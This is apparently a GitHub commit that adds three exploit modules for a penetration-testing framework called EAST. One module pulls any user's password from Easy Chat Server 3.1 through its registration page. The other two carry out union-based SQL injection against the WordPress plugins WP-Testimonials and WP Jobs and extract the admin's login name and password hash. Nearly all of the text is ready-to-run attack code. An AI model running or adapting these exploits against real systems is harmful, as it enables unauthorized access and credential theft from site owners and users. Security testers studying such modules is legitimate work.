-
Notifications
You must be signed in to change notification settings - Fork 112
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
3 changed files
with
317 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
#! /usr/bin/env python | ||
# -*- coding: utf_8 -*- | ||
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution | ||
|
||
import sys | ||
import os | ||
import re | ||
import urllib2 | ||
|
||
sys.path.append('./core') | ||
from Sploit import Sploit | ||
|
||
INFO = {} | ||
INFO['NAME'] = "efa_easy_chat_server_pd" | ||
INFO['DESCRIPTION'] = "Easy Chat Server 3.1 Password Disclosure" | ||
INFO['VENDOR'] = "http://echatserver.com" | ||
INFO['DOWNLOAD_LINK'] = 'http://echatserver.com/ecssetup.exe' | ||
INFO['LINKS'] = ['https://packetstormsecurity.com/files/142884/Easy-Chat-Server-3.1-Password-Disclosure.html'] | ||
INFO["CVE Name"] = "" | ||
INFO["NOTES"] = """Registeration page 'register.ghp' allows disclosing ANY user's password. Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password." | ||
""" | ||
INFO['CHANGELOG'] = "15 Jun, 2017. Written by Gleg team." | ||
INFO['PATH'] = 'Exploits/Web/' | ||
|
||
# Must be in every module, to be set by framework | ||
OPTIONS = {} | ||
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') | ||
OPTIONS["PORT"] = 80, dict(description = 'Target port') | ||
OPTIONS["USER"] = 'admin', dict(description = 'Username') | ||
|
||
|
||
class exploit(Sploit): | ||
def __init__(self, host = "", port = 0, logger = None): | ||
Sploit.__init__(self, logger = logger) | ||
self.name = INFO['NAME'] | ||
self.port = port | ||
self.host = host | ||
self.user = '' | ||
|
||
def args(self): | ||
self.args = Sploit.args(self, OPTIONS) | ||
self.host = self.args.get('HOST', self.host) | ||
self.port = int(self.args.get('PORT', self.port)) | ||
self.user = self.args.get('USER', 'admin') | ||
|
||
def make_url(self, path = ''): | ||
return 'http://{}:{}{}'.format(self.host, self.port, path) | ||
|
||
def run(self): | ||
self.args() | ||
self.log("Attacking {}".format(self.host)) | ||
|
||
url = self.make_url('/register.ghp?username={}&password='.format(self.user)) | ||
try: | ||
fd = urllib2.urlopen(url) | ||
content = fd.read() | ||
except Exception as e: | ||
self.log(e) | ||
self.finish(False) | ||
|
||
result = re.findall('<INPUT type="password" name="Password" maxlength="30" value="(.+?)">', content) | ||
if len(result) > 0: | ||
self.log('Password: ' + result[0]) | ||
self.finish(True) | ||
else: | ||
self.log('User not Found') | ||
self.finish(False) | ||
|
||
if __name__ == '__main__': | ||
""" | ||
By now we only have the tool mode for exploit.. | ||
Later we would have standalone mode also. | ||
""" | ||
|
||
print "Running exploit %s .. " % INFO['NAME'] | ||
e = exploit('', 80) | ||
e.run() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,120 @@ | ||
#! /usr/bin/env python | ||
# -*- coding: utf_8 -*- | ||
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution | ||
|
||
import sys | ||
import re | ||
import base64 | ||
import urllib | ||
import urllib2 | ||
import cookielib | ||
|
||
sys.path.append("./core") | ||
from Sploit import Sploit | ||
|
||
INFO = {} | ||
INFO['NAME'] = "efa_wordpress_testimonials_sqli" | ||
INFO['DESCRIPTION'] = "WP-Testimonials WordPress Plugin v.3.4.1 - Union Based SQL Injection" | ||
INFO['VENDOR'] = "http://www.sunfrogservices.com/web-programmer/wp-testimonials/" | ||
INFO['DOWNLOAD_LINK'] = '' | ||
INFO['LINKS'] = ['https://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-injection-sqli/'] | ||
INFO["CVE Name"] = "" | ||
INFO["NOTES"] = """SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows to an authenticated user to execute arbitrary SQL commands via the testid parameter.""" | ||
|
||
INFO['CHANGELOG'] = "14 Jun, 2017. Written by Gleg team." | ||
INFO['PATH'] = 'Exploits/Web/' | ||
|
||
# Must be in every module, to be set by framework | ||
OPTIONS = {} | ||
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') | ||
OPTIONS["PORT"] = "80", dict(description = 'Target port') | ||
OPTIONS["BASEPATH"] = '/wordpress', dict(description = 'Basepath') | ||
OPTIONS["USERNAME"] = 'admin', dict(description = 'Registered user') | ||
OPTIONS["PASSWORD"] = 'password', dict(description = 'Password') | ||
OPTIONS["SSL"] = False, dict(description = 'Use SSL') | ||
|
||
class exploit(Sploit): | ||
def __init__(self, host="", port=0, logger=None): | ||
Sploit.__init__(self, logger = logger) | ||
self.name = INFO['NAME'] | ||
self.port = port | ||
self.host = host | ||
self.ssl = False | ||
self.basepath = "/" | ||
self.username = '' | ||
self.password = '' | ||
|
||
def args(self): | ||
self.args = Sploit.args(self, OPTIONS) | ||
self.host = self.args.get('HOST', self.host) | ||
self.port = int(self.args.get('PORT', self.port)) | ||
self.basepath = self.args.get('BASEPATH', self.basepath) | ||
self.username = self.args.get('USERNAME', self.username) | ||
self.password = self.args.get('PASSWORD', self.password) | ||
self.ssl = self.args.get('SSL', self.ssl) | ||
|
||
self.cookiesjar = cookielib.CookieJar() | ||
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar)) | ||
urllib2.install_opener(opener) | ||
|
||
def make_url(self, path = ''): | ||
return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path) | ||
|
||
def prot(self): | ||
return self.ssl and 'https://' or 'http://' | ||
|
||
def auth_wordpress(self, username, password): | ||
|
||
url = self.make_url('/wp-login.php') | ||
data = 'log={}&pwd={}&redirect_to=&testcookie=0&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8'.format(username, password) | ||
|
||
fd = urllib2.urlopen(url) | ||
init_cookie = fd.headers['Set-Cookie'] | ||
|
||
request = urllib2.Request(url, data) | ||
request.add_header('Cookie', init_cookie) | ||
fd = urllib2.urlopen(request) | ||
|
||
power_cookie = '' | ||
for k in self.cookiesjar: | ||
power_cookie += k.name + '=' + k.value + ';' | ||
return power_cookie | ||
|
||
|
||
def run(self): | ||
self.args() | ||
|
||
cookies = self.auth_wordpress(self.username, self.password) | ||
url = self.make_url('/wp-admin/admin.php?') | ||
|
||
sql = 'page=sfstst_manage&mode=sfststedit&testid=' + urllib.quote('-1 UNION ALL SELECT NULL,CONCAT(char(35,35,35),user_login,char(58),user_pass,char(35,35,35)),NULL,NULL,NULL,NULL,NULL,NULL FROM wp_users where id=1 -- comment') | ||
|
||
self.log('Begin extracting admin\'s credentials') | ||
result = '' | ||
try: | ||
request = urllib2.Request(url + sql, headers = {'Cookie': cookies}) | ||
fd = urllib2.urlopen(request) | ||
result = fd.read() | ||
result = result.split('###')[1] | ||
except Exception as e: | ||
self.log(e) | ||
self.log("Failed!") | ||
self.finish(False) | ||
|
||
if result: | ||
self.log('Output format username:hash-password') | ||
self.log('=' * 60) | ||
self.log('End with: {}'.format(result)) | ||
self.log('=' * 60) | ||
self.finish(True) | ||
|
||
self.finish(False) | ||
|
||
if __name__ == '__main__': | ||
""" | ||
By now we only have the tool mode for exploit.. | ||
Later we would have standalone mode also. | ||
""" | ||
print "Running exploit %s .. " % INFO['NAME'] | ||
e = exploit("192.168.0.1", 80) | ||
e.run() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,120 @@ | ||
#! /usr/bin/env python | ||
# -*- coding: utf_8 -*- | ||
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution | ||
|
||
import sys | ||
import re | ||
import base64 | ||
import urllib | ||
import urllib2 | ||
import cookielib | ||
|
||
sys.path.append("./core") | ||
from Sploit import Sploit | ||
|
||
INFO = {} | ||
INFO['NAME'] = "efa_wordpress_wp_jobs_sqli" | ||
INFO['DESCRIPTION'] = "WordPress Plugin WP Jobs < 1.5 - SQL Injection" | ||
INFO['VENDOR'] = "http://www.intensewp.com/" | ||
INFO['DOWNLOAD_LINK'] = '' | ||
INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42172/'] | ||
INFO["CVE Name"] = "CVE-2017-9603" | ||
INFO["NOTES"] = """SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress allows authenticated users to execute arbitrary SQL commands via the jobid parameter to wp-admin/edit.php""" | ||
|
||
INFO['CHANGELOG'] = "14 Jun, 2017. Written by Gleg team." | ||
INFO['PATH'] = 'Exploits/Web/' | ||
|
||
# Must be in every module, to be set by framework | ||
OPTIONS = {} | ||
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP') | ||
OPTIONS["PORT"] = "80", dict(description = 'Target port') | ||
OPTIONS["BASEPATH"] = '/wordpress', dict(description = 'Basepath') | ||
OPTIONS["USERNAME"] = 'admin', dict(description = 'Registered user') | ||
OPTIONS["PASSWORD"] = 'password', dict(description = 'Password') | ||
OPTIONS["SSL"] = False, dict(description = 'Use SSL') | ||
|
||
class exploit(Sploit): | ||
def __init__(self, host="", port=0, logger=None): | ||
Sploit.__init__(self, logger = logger) | ||
self.name = INFO['NAME'] | ||
self.port = port | ||
self.host = host | ||
self.ssl = False | ||
self.basepath = "/" | ||
self.username = '' | ||
self.password = '' | ||
|
||
def args(self): | ||
self.args = Sploit.args(self, OPTIONS) | ||
self.host = self.args.get('HOST', self.host) | ||
self.port = int(self.args.get('PORT', self.port)) | ||
self.basepath = self.args.get('BASEPATH', self.basepath) | ||
self.username = self.args.get('USERNAME', self.username) | ||
self.password = self.args.get('PASSWORD', self.password) | ||
self.ssl = self.args.get('SSL', self.ssl) | ||
|
||
self.cookiesjar = cookielib.CookieJar() | ||
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar)) | ||
urllib2.install_opener(opener) | ||
|
||
def make_url(self, path = ''): | ||
return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path) | ||
|
||
def prot(self): | ||
return self.ssl and 'https://' or 'http://' | ||
|
||
def auth_wordpress(self, username, password): | ||
|
||
url = self.make_url('/wp-login.php') | ||
data = 'log={}&pwd={}&redirect_to=&testcookie=0&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8'.format(username, password) | ||
|
||
fd = urllib2.urlopen(url) | ||
init_cookie = fd.headers['Set-Cookie'] | ||
|
||
request = urllib2.Request(url, data) | ||
request.add_header('Cookie', init_cookie) | ||
fd = urllib2.urlopen(request) | ||
|
||
power_cookie = '' | ||
for k in self.cookiesjar: | ||
power_cookie += k.name + '=' + k.value + ';' | ||
return power_cookie | ||
|
||
|
||
def run(self): | ||
self.args() | ||
|
||
cookies = self.auth_wordpress(self.username, self.password) | ||
url = self.make_url('/wp-admin/edit.php?') | ||
|
||
sql = 'post_type=job&page=WPJobsJobApps&jobid=' + urllib.quote('5 UNION ALL SELECT NULL,NULL,NULL,CONCAT(char(35,35,35),user_login,char(58),user_pass,char(35,35,35)),NULL,NULL FROM wp_users where id=1 -- comment') | ||
|
||
self.log('Begin extracting admin\'s credentials') | ||
result = '' | ||
try: | ||
request = urllib2.Request(url + sql, headers = {'Cookie': cookies}) | ||
fd = urllib2.urlopen(request) | ||
result = fd.read() | ||
result = result.split('###')[1] | ||
except Exception as e: | ||
self.log(e) | ||
self.log("Failed!") | ||
self.finish(False) | ||
|
||
if result: | ||
self.log('Output format username:hash-password') | ||
self.log('=' * 60) | ||
self.log('End with: {}'.format(result)) | ||
self.log('=' * 60) | ||
self.finish(True) | ||
|
||
self.finish(False) | ||
|
||
if __name__ == '__main__': | ||
""" | ||
By now we only have the tool mode for exploit.. | ||
Later we would have standalone mode also. | ||
""" | ||
print "Running exploit %s .. " % INFO['NAME'] | ||
e = exploit("192.168.0.1", 80) | ||
e.run() |